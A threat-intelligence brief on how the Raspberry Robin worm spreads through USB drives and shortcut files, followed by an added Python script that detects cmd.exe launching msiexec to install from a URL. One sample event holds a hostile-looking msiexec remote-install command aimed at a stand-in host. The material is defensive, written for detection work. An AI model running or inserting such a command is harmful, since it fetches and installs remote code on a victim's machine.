2022-07-13

Researchers Found Infection Chain in USB Devices and Shared Folders

Level: Tactical | Source: Cybereason
Cybersecurity

Cybereason shared an infection chain involving Raspberry Robin, a malware worm that is often distributed through infected USB devices or shared folders. Although it is most commonly observed infecting victims through Microsoft shortcut (LNK) files, the delivery method has varied "through file archives, removable devices (USB) or ISO files." The LNK file calls on the Windows command shell to spawn msiexec.exe, which proxies the download of a malicious DLL file. To maintain stealth, the malware injects itself into three processes, often rundll32.exe, regsvr32.exe, and dllhost.exe. Persistence is established through the registry run key.
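The process-creation pattern described above (command shell spawning msiexec.exe with a remote package source) can be hunted for in endpoint telemetry. The following is an added example, not code from Cybereason or Anvilogic; the event field names and the sample events are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Remote package source anywhere in the msiexec command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# msiexec install switches, accepted with '/' or '-' and in any letter case.
INSTALL_RE = re.compile(r"(?<=\s)[/-](?:i|package)\b", re.IGNORECASE)

SYS32 = "C:\\Windows\\System32\\"
# Constructed process-creation events (hypothetical field names).
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": SYS32 + "cmd.exe",
     "image": SYS32 + "msiexec.exe",
     "command_line": "mSiExEc /q -I http://example.test:8080/a/ws-01"},
    {"host": "ws-02", "parent_image": "C:\\Windows\\explorer.exe",
     "image": SYS32 + "msiexec.exe",
     "command_line": 'msiexec.exe /i "C:\\Temp\\setup.msi"'},
    {"host": "ws-03", "parent_image": SYS32 + "cmd.exe",
     "image": SYS32 + "msiexec.exe",
     "command_line": "msiexec /i C:\\Installers\\agent.msi /qn"},
]

def is_msiexec_download(event):
    """True when cmd.exe spawns msiexec.exe to install from a URL."""
    child = basename(event["image"]).lower()
    parent = basename(event["parent_image"]).lower()
    cmdline = event["command_line"]
    return (child == "msiexec.exe"
            and parent == "cmd.exe"
            and INSTALL_RE.search(cmdline) is not None
            and URL_RE.search(cmdline) is not None)

def detect(events):
    """Return host and remote source for each matching event."""
    hits = []
    for ev in events:
        if is_msiexec_download(ev):
            url = URL_RE.search(ev["command_line"]).group(0)
            hits.append({"host": ev["host"], "url": url})
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"ALERT {hit['host']}: msiexec remote install from {hit['url']}")
```

Local installs (ws-02, ws-03) are not flagged; only the cmd.exe-spawned install from a URL is, regardless of letter casing or switch prefix.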

     
